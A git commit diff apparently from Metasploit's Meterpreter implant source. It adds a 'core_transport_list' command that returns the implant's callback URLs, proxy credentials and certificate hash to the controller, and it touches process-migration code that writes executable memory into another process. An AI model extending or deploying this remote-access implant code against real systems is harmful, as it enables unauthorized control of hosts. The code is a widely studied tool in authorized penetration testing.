Add transport listing

2025-03-24 18:16:24 +01:00 · 2015-05-04 11:18:48 +10:00 · 2015-05-04 11:18:48 +10:00 · 952bcd7f32
commit 952bcd7f32
parent bfccf50c6b
4 changed files with 109 additions and 25 deletions
--- a/c/meterpreter/source/common/arch/win/i386/base_dispatch.c
+++ b/c/meterpreter/source/common/arch/win/i386/base_dispatch.c
@ -119,7 +119,7 @@ DWORD create_transport_from_request(Remote* remote, Packet* packet, Transport**
 		{
 			BOOL ssl = wcsncmp(transportUrl, L"https", 5) == 0;
 			wchar_t* ua = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_UA);
-			wchar_t* proxy = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_PROXY_INFO);
+			wchar_t* proxy = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_PROXY_HOST);
 			wchar_t* proxyUser = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_PROXY_USER);
 			wchar_t* proxyPass = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_PROXY_PASS);
 			PBYTE certHash = packet_get_tlv_value_raw(packet, TLV_TYPE_TRANS_CERT_HASH);
@ -172,6 +172,86 @@ DWORD create_transport_from_request(Remote* remote, Packet* packet, Transport**
 	return result;
 }

+DWORD remote_request_core_transport_list(Remote* remote, Packet* packet)
+{
+	DWORD result = ERROR_SUCCESS;
+	Packet* response = NULL;
+
+	do
+	{
+		response = packet_create_response(packet);
+
+		if (!response)
+		{
+			result = ERROR_NOT_ENOUGH_MEMORY;
+			break;
+		}
+
+		// Add the session timeout to the top level
+		packet_add_tlv_uint(response, TLV_TYPE_TRANS_SESSION_EXP, remote->sess_expiry_end - current_unix_timestamp());
+
+		Transport* current = remote->transport;
+		Transport* first = remote->transport;
+
+		do
+		{
+			Packet* transportGroup = packet_create_group();
+
+			if (!transportGroup)
+			{
+				// bomb out, returning what we have so far.
+				break;
+			}
+
+			dprintf("[DISPATCH] Adding URL %S", current->url);
+			packet_add_tlv_wstring(transportGroup, TLV_TYPE_TRANS_URL, current->url);
+			dprintf("[DISPATCH] Adding Comms timeout %u", current->timeouts.comms);
+			packet_add_tlv_uint(transportGroup, TLV_TYPE_TRANS_COMM_TIMEOUT, current->timeouts.comms);
+			dprintf("[DISPATCH] Adding Retry total %u", current->timeouts.retry_total);
+			packet_add_tlv_uint(transportGroup, TLV_TYPE_TRANS_RETRY_TOTAL, current->timeouts.retry_total);
+			dprintf("[DISPATCH] Adding Retry wait %u", current->timeouts.retry_wait);
+			packet_add_tlv_uint(transportGroup, TLV_TYPE_TRANS_RETRY_WAIT, current->timeouts.retry_wait);
+
+			if (current->type != METERPRETER_TRANSPORT_SSL)
+			{
+				HttpTransportContext* ctx = (HttpTransportContext*)current->ctx;
+				dprintf("[DISPATCH] Transport is HTTP/S");
+				if (ctx->ua)
+				{
+					packet_add_tlv_wstring(transportGroup, TLV_TYPE_TRANS_UA, ctx->ua);
+				}
+				if (ctx->proxy)
+				{
+					packet_add_tlv_wstring(transportGroup, TLV_TYPE_TRANS_PROXY_HOST, ctx->proxy);
+				}
+				if (ctx->proxy_user)
+				{
+					packet_add_tlv_wstring(transportGroup, TLV_TYPE_TRANS_PROXY_USER, ctx->proxy_user);
+				}
+				if (ctx->proxy_pass)
+				{
+					packet_add_tlv_wstring(transportGroup, TLV_TYPE_TRANS_PROXY_PASS, ctx->proxy_pass);
+				}
+				if (ctx->cert_hash)
+				{
+					packet_add_tlv_raw(transportGroup, TLV_TYPE_TRANS_CERT_HASH, ctx->cert_hash, CERT_HASH_SIZE);
+				}
+			}
+
+			packet_add_group(response, TLV_TYPE_TRANS_GROUP, transportGroup);
+
+			current = current->next_transport;
+		} while (first != current);
+	} while (0);
+
+	if (response)
+	{
+		packet_transmit_response(result, remote, response);
+	}
+
+	return result;
+}
+
 BOOL remote_request_core_transport_next(Remote* remote, Packet* packet, DWORD* result)
 {
 	dprintf("[DISPATCH] Asking to go to next transport (from 0x%p to 0x%p)", remote->transport, remote->transport->next_transport);
@ -484,7 +564,7 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
 			break;
 		}

-		// Allocate memory for the migrate stub, context and payload
+		// Allocate memory for the migrate stub, context, payload and configuration block
 		lpMemory = (LPBYTE)VirtualAllocEx(hProcess, NULL, dwMigrateStubLength + sizeof(MIGRATECONTEXT) + dwPayloadLength + configSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 		if (!lpMemory)
 		{
@ -578,7 +658,7 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
 * @remark If no values are given, no updates are made. The response to
           this message is the new/current settings.
 */
-DWORD remote_request_transport_set_timeouts(Remote * remote, Packet * packet)
+DWORD remote_request_core_transport_set_timeouts(Remote * remote, Packet * packet)
 {
 	DWORD result = ERROR_SUCCESS;
 	Packet* response = NULL;
--- a/c/meterpreter/source/common/base.c
+++ b/c/meterpreter/source/common/base.c
@ -20,7 +20,7 @@ extern DWORD remote_request_core_crypto_negotiate(Remote *remote, Packet *packet

 extern BOOL remote_request_core_shutdown(Remote *remote, Packet *packet, DWORD* pResult);

-extern DWORD remote_request_transport_set_timeouts(Remote * remote, Packet * packet);
+extern DWORD remote_request_core_transport_set_timeouts(Remote * remote, Packet * packet);

 #ifdef _WIN32
 extern DWORD remote_request_core_transport_getcerthash(Remote* remote, Packet* packet);
@ -29,6 +29,7 @@ extern DWORD remote_request_core_transport_setcerthash(Remote* remote, Packet* p
 // POSIX support coming soon
 #endif

+extern DWORD remote_request_core_transport_list(Remote* remote, Packet* packet);
 extern BOOL remote_request_core_transport_change(Remote *remote, Packet *packet, DWORD* pResult);
 extern BOOL remote_request_core_transport_next(Remote* remote, Packet* packet, DWORD* result);
 extern BOOL remote_request_core_transport_prev(Remote* remote, Packet* packet, DWORD* result);
@ -86,11 +87,12 @@ Command baseCommands[] =
 	// Crypto
 	COMMAND_REQ("core_crypto_negotiate", remote_request_core_crypto_negotiate),
 	// timeouts
-	COMMAND_REQ("core_transport_set_timeouts", remote_request_transport_set_timeouts),
+	COMMAND_REQ("core_transport_set_timeouts", remote_request_core_transport_set_timeouts),
 #ifdef _WIN32
 	COMMAND_REQ("core_transport_getcerthash", remote_request_core_transport_getcerthash),
 	COMMAND_REQ("core_transport_setcerthash", remote_request_core_transport_setcerthash),
 #endif
+	COMMAND_REQ("core_transport_list", remote_request_core_transport_list),
 	COMMAND_INLINE_REQ("core_transport_change", remote_request_core_transport_change),
 	COMMAND_INLINE_REQ("core_transport_next", remote_request_core_transport_next),
 	COMMAND_INLINE_REQ("core_transport_prev", remote_request_core_transport_prev),
--- a/c/meterpreter/source/common/core.h
+++ b/c/meterpreter/source/common/core.h
@ -151,11 +151,12 @@ typedef enum
 	TLV_TYPE_TRANS_COMM_TIMEOUT  = TLV_VALUE(TLV_META_TYPE_UINT,      433),   ///! Represents the communications timeout.
 	TLV_TYPE_TRANS_SESSION_EXP   = TLV_VALUE(TLV_META_TYPE_UINT,      434),   ///! Represents the session expiration.
 	TLV_TYPE_TRANS_CERT_HASH     = TLV_VALUE(TLV_META_TYPE_RAW,       435),   ///! Represents the certificate hash (for https).
-	TLV_TYPE_TRANS_PROXY_INFO    = TLV_VALUE(TLV_META_TYPE_STRING,    436),   ///! Represents the proxy info string (for http).
-	TLV_TYPE_TRANS_PROXY_USER    = TLV_VALUE(TLV_META_TYPE_STRING,    437),   ///! Represents the proxy user name (for http).
-	TLV_TYPE_TRANS_PROXY_PASS    = TLV_VALUE(TLV_META_TYPE_STRING,    438),   ///! Represents the proxy password (for http).
+	TLV_TYPE_TRANS_PROXY_HOST    = TLV_VALUE(TLV_META_TYPE_STRING,    436),   ///! Represents the proxy host string (for http/s).
+	TLV_TYPE_TRANS_PROXY_USER    = TLV_VALUE(TLV_META_TYPE_STRING,    437),   ///! Represents the proxy user name (for http/s).
+	TLV_TYPE_TRANS_PROXY_PASS    = TLV_VALUE(TLV_META_TYPE_STRING,    438),   ///! Represents the proxy password (for http/s).
 	TLV_TYPE_TRANS_RETRY_TOTAL   = TLV_VALUE(TLV_META_TYPE_UINT,      439),   ///! Total time (seconds) to continue retrying comms.
 	TLV_TYPE_TRANS_RETRY_WAIT    = TLV_VALUE(TLV_META_TYPE_UINT,      440),   ///! Time (seconds) to wait between reconnect attempts.
+	TLV_TYPE_TRANS_GROUP         = TLV_VALUE(TLV_META_TYPE_GROUP,     441),   ///! A single transport grouping.

 	// session/machine identification
 	TLV_TYPE_MACHINE_ID          = TLV_VALUE(TLV_META_TYPE_STRING,    460),   ///! Represents a machine identifier.
--- a/c/meterpreter/source/server/metsrv.c
+++ b/c/meterpreter/source/server/metsrv.c
@ -10,30 +10,31 @@

 #endif

-/*
- * Entry point for the DLL (or not if compiled as an EXE)
- */
 #ifdef _WIN32
-DWORD __declspec(dllexport) Init(LPVOID config)
+DWORD __declspec(dllexport) Init(SOCKET fd)
 {
-	MetsrvConfig* metConfig = (MetsrvConfig*)config;
+	// In the case of metsrv payloads, the parameter passed to init is NOT a socket, it's actually
+	// a pointer to the metserv configuration, so do a nasty cast and move on.
+	MetsrvConfig* metConfig = (MetsrvConfig*)fd;
 	DWORD result = server_setup(metConfig);

 	dprintf("[METSRV] Exiting with %08x", metConfig->session.exit_func);

-	switch(metConfig->session.exit_func)
+	// We also handle exit func directly in metsrv now because the value is added to the
+	// configuration block and we manage to save bytes in the stager/header as well.
+	switch (metConfig->session.exit_func)
 	{
-		case EXITFUNC_SEH:
-			SetUnhandledExceptionFilter( NULL );
-			break;
-		case EXITFUNC_THREAD:
-			ExitThread( 0 );
-			break;
-		case EXITFUNC_PROCESS:
-			ExitProcess( 0 );
-			break;
-		default:
-			break;
+	case EXITFUNC_SEH:
+		SetUnhandledExceptionFilter(NULL);
+		break;
+	case EXITFUNC_THREAD:
+		ExitThread(0);
+		break;
+	case EXITFUNC_PROCESS:
+		ExitProcess(0);
+		break;
+	default:
+		break;
 	}
 	return result;
 }